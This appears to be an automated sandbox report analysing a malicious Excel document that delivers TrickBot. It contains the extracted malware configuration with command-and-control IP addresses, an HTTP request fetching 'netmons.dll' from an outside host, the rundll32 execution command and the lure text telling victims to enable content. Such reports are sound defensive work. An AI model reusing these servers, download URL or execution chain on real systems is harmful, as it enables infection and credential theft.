Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Heur.32219.22782

Overview

General Information

Sample Name:SecuriteInfo.com.Heur.32219.22782 (renamed file extension from 22782 to xls)
Analysis ID:412857
MD5:1ce9bb4784ef70cd5d09291a5005ab51
SHA1:f4c3e4d7be3e6855c0272b0c2f3a2833bd6963a1
SHA256:dfae46a2c8083b6cf4f91691289ca97cbcc002126058a2900f09564edccffdfb
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 TrickBot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Trickbot
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 672 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2640 cmdline: rundll32 ..\hsdksksk.iem,StartW MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2676 cmdline: rundll32 ..\hsdksksk.iem,StartW MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • wermgr.exe (PID: 2320 cmdline: C:\Windows\system32\wermgr.exe MD5: 41DF7355A5A907E2C1D7804EC028965D)
  • cleanup

Malware Configuration

Threatname: Trickbot

{"ver": "2000029", "gtag": "net15", "servs": ["103.66.72.217:443", "117.252.68.211:443", "103.124.173.35:443", "115.73.211.230:443", "117.54.250.246:443", "131.0.112.122:443", "69.109.35.254:20445", "43.17.158.63:36366", "130.180.24.227:44321", "131.168.228.35:19932", "185.31.222.247:49372", "151.187.13.249:46881", "190.186.36.209:40737", "42.139.161.213:11056", "23.95.165.4:64265", "189.169.15.32:42761", "125.6.227.80:58405", "217.159.190.123:8412", "47.106.66.231:10710", "46.136.156.92:5385"], "autorun": ["pwgrabb", "pwgrabc"], "ecc_key": "RUNTMzAAAAAL/ZqmMPBLaRfg1hPOtFJrZz2Zi2/EC4B3fiX8VnaOUVKndBr+jEqWc7mw4v3ADTiwp64K5QKe1LZ27jUZxL4bWjxARPo85hv72nuedeZhRQ+adQQ/gIsV869MycRzghc="}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.Heur.32219.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0x1675d:$e1: Enable Editing
  • 0x16495:$e3: Enable editing
  • 0x16572:$e4: Enable content

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2100678651.0000000000470000.00000040.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
    00000004.00000002.2100567095.00000000002C0000.00000040.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
      00000004.00000002.2100613239.00000000003A4000.00000004.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
        00000004.00000002.2100649939.00000000003E1000.00000020.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          4.2.rundll32.exe.3e0000.2.unpackJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
            4.2.rundll32.exe.2c052e.1.raw.unpackJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
              4.2.rundll32.exe.2c052e.1.unpackJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
                Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\hsdksksk.iem,StartW, CommandLine: rundll32 ..\hsdksksk.iem,StartW, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 672, ProcessCommandLine: rundll32 ..\hsdksksk.iem,StartW, ProcessId: 2640

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Found malware configurationShow sources
                Source: 00000004.00000002.2100678651.0000000000470000.00000040.00000001.sdmpMalware Configuration Extractor: Trickbot {"ver": "2000029", "gtag": "net15", "servs": ["103.66.72.217:443", "117.252.68.211:443", "103.124.173.35:443", "115.73.211.230:443", "117.54.250.246:443", "131.0.112.122:443", "69.109.35.254:20445", "43.17.158.63:36366", "130.180.24.227:44321", "131.168.228.35:19932", "185.31.222.247:49372", "151.187.13.249:46881", "190.186.36.209:40737", "42.139.161.213:11056", "23.95.165.4:64265", "189.169.15.32:42761", "125.6.227.80:58405", "217.159.190.123:8412", "47.106.66.231:10710", "46.136.156.92:5385"], "autorun": ["pwgrabb", "pwgrabc"], "ecc_key": "RUNTMzAAAAAL/ZqmMPBLaRfg1hPOtFJrZz2Zi2/EC4B3fiX8VnaOUVKndBr+jEqWc7mw4v3ADTiwp64K5QKe1LZ27jUZxL4bWjxARPo85hv72nuedeZhRQ+adQQ/gIsV869MycRzghc="}
                Multi AV Scanner detection for dropped fileShow sources
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dllReversingLabs: Detection: 12%
                Source: C:\Users\user\hsdksksk.iemReversingLabs: Detection: 12%
                Multi AV Scanner detection for submitted fileShow sources
                Source: SecuriteInfo.com.Heur.32219.xlsVirustotal: Detection: 8%Perma Link
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: Binary string: k:\MSSniffer\Release\Sniffer.pdb\A source: hsdksksk.iem.0.dr
                Source: Binary string: k:\MSSniffer\Release\Sniffer.pdb source: hsdksksk.iem.0.dr

                Software Vulnerabilities:

                barindex
                Document exploit detected (creates forbidden files)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dllJump to behavior
                Document exploit detected (drops PE files)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: netmons[1].dll.0.drJump to dropped file
                Document exploit detected (UrlDownloadToFile)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
                Document exploit detected (process start blacklist hit)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
                Source: global trafficDNS query: name: koneckotechnology.com
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.54.114.131:80
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.54.114.131:80
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 12 May 2021 23:49:19 GMTserver: Apachelast-modified: Wed, 12 May 2021 13:22:52 GMTaccept-ranges: bytescontent-length: 643072content-type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 67 5d 9f e5 23 3c f1 b6 23 3c f1 b6 23 3c f1 b6 a0 34 ae b6 29 3c f1 b6 d9 1f e8 b6 25 3c f1 b6 30 34 ac b6 21 3c f1 b6 26 30 fe b6 38 3c f1 b6 26 30 ae b6 a9 3c f1 b6 23 3c f0 b6 62 3e f1 b6 a0 34 ac b6 30 3c f1 b6 26 30 91 b6 57 3c f1 b6 26 30 ad b6 22 3c f1 b6 cf 37 af b6 22 3c f1 b6 26 30 ab b6 22 3c f1 b6 52 69 63 68 23 3c f1 b6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c1 ab 9b 60 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 07 0a 00 80 02 00 00 40 07 00 00 00 00 00 9a f2 00 00 00 10 00 00 00 90 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0a 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 3e 03 00 45 00 00 00 5c 21 03 00 04 01 00 00 00 a0 03 00 7c cf 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 09 00 80 34 00 00 a0 95 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 e6 02 00 48 00 00 00 00 00 00 00 00 00 00 00 00 90 02 00 94 05 00 00 d4 20 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9e 78 02 00 00 10 00 00 00 80 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 55 ae 00 00 00 90 02 00 00 b0 00 00 00 90 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a4 59 00 00 00 40 03 00 00 30 00 00 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 7c cf 05 00 00 a0 03 00 00 d0 05 00 00 70 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 04 81 00 00 00 70 09 00 00 90 00 00 00 40 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                Source: Joe Sandbox ViewIP Address: 198.54.114.131 198.54.114.131
                Source: global trafficHTTP traffic detected: GET /netmons.dll HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: koneckotechnology.comConnection: Keep-Alive
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\70BA6ED2.emfJump to behavior
                Source: global trafficHTTP traffic detected: GET /netmons.dll HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: koneckotechnology.comConnection: Keep-Alive
                Source: rundll32.exe, 00000003.00000002.2101618161.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                Source: unknownDNS traffic detected: queries for: koneckotechnology.com
                Source: rundll32.exe, 00000003.00000002.2101618161.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                Source: rundll32.exe, 00000003.00000002.2101618161.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                Source: rundll32.exe, 00000003.00000002.2101849521.0000000001E37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2101059002.0000000002057000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                Source: rundll32.exe, 00000003.00000002.2101849521.0000000001E37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2101059002.0000000002057000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                Source: rundll32.exe, 00000003.00000002.2101849521.0000000001E37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2101059002.0000000002057000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                Source: rundll32.exe, 00000003.00000002.2101849521.0000000001E37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2101059002.0000000002057000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                Source: rundll32.exe, 00000003.00000002.2101618161.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                Source: rundll32.exe, 00000003.00000002.2101849521.0000000001E37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2101059002.0000000002057000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                Source: rundll32.exe, 00000003.00000002.2101618161.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                Source: rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.

                System Summary:

                barindex
                Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                Source: Screenshot number: 4Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 4Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 8Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 8Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 12Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 12Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 16Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 16Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 20Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 20Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 24Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 24Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 28Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 28Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 32Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 32Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 36Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 36Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 40Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 40Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 44Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 44Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 48Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 48Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 52Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 52Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 56Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 56Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 60Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 60Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 64Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 64Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 68Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 68Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 72Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 72Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 76Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 76Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 80Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 80Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 84Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 84Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 88Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 88Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 92Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 92Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 96Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 96Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 100Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 100Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 104Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 104Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 108Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 108Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 112Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 112Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 116Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 116Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 120Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 120Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 124Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 124Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 128Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 128Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 132Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 132Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 136Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 136Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 140Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 140Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 144Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 144Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Found Excel 4.0 Macro with suspicious formulasShow sources
                Source: SecuriteInfo.com.Heur.32219.xlsInitial sample: EXEC
                Office process drops PE fileShow sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\hsdksksk.iemJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dllJump to dropped file
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                Source: SecuriteInfo.com.Heur.32219.xlsOLE indicator, VBA macros: true
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dll 697DEA4B154178E8DE096C66167B539AA4465155D294B11765F1A1886EB7C56D
                Source: Joe Sandbox ViewDropped File: C:\Users\user\hsdksksk.iem 697DEA4B154178E8DE096C66167B539AA4465155D294B11765F1A1886EB7C56D
                Source: SecuriteInfo.com.Heur.32219.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
                Source: rundll32.exe, 00000003.00000002.2101618161.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@7/7@1/1
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DATJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD6FD.tmpJump to behavior
                Source: SecuriteInfo.com.Heur.32219.xlsOLE indicator, Workbook stream: true
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\hsdksksk.iem,StartW
                Source: SecuriteInfo.com.Heur.32219.xlsVirustotal: Detection: 8%
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\hsdksksk.iem,StartW
                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\hsdksksk.iem,StartW
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\hsdksksk.iem,StartWJump to behavior
                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\hsdksksk.iem,StartWJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exeJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
